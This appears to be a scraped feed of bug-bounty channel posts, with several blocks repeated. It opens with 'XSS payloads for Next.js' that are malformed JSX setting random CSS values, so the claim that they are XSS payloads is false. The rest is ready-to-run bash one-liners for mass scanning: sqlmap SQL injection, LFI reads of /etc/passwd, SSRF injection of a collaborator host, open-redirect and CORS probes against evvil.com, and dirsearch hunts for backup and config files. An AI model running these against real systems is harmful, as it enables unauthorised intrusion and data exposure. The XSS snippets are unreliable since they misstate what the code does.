Lesser-known XSS payloads that work with Next.js
[ what you think? ]
- Dynamic CSS injection
<div style={
- CSS Variable injection
<div style={
- Object Literal injection
<div style={
- CSS Flexbox injection
<div style={
- Unicode Character injection
<div style={
- Dynamic Font injection
<div style={
- CSS Animation injection
<div style={
- Web Font injection
<div style={
- CSS Grid injection
<div style={
- CSS Transform injection
<div style={
[ what you think? ]
- Dynamic CSS injection
<div style={
background-color: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- CSS Variable injection
<div style={
--var: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Object Literal injection
<div style={
position: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- CSS Flexbox injection
<div style={
display: flex; justify-content: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Unicode Character injection
<div style={
font-family: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Dynamic Font injection
<div style={
font-family: ${Math.random().toString(36).substr(2, 10) + 'px'}}>XSS</div>- CSS Animation injection
<div style={
animation: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- Web Font injection
<div style={
font-family: ${Math.random().toString(36).substr(2, 10) + '-webfont'}}>XSS</div>- CSS Grid injection
<div style={
display: grid; grid-template-columns: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>- CSS Transform injection
<div style={
transform: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>👍25❤3👏3
Today I made a video that uses a tool through the video and can detect xss through a tool without having to do anything else.
🔥13
🚀 Automated XSS Methodology for Bug Bounty Hunters | 1-Click Exploits
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
YouTube
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
❤10👍2
👨💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
🔥18❤14👍8🥰4
⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
❤10👍2🤡2⚡1👎1🖕1
Bug - Information disclosure on restricted subdomain
Steps:
subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}
cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,https://sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt
hashtag#Infosec hashtag#Bugbounty hashtag#WAPT
Steps:
subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}
cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,https://sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt
hashtag#Infosec hashtag#Bugbounty hashtag#WAPT
👍33🔥11❤4
Automated JS Endpoint Extraction and Verification with HTTPX and Gau
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
❤24👍10🔥9😎1
Sorry I can't give you anything or watch any videos because I'm really busy with my college for a few days and I have some work to do.
🙏17❤9⚡3🤩2👎1💔1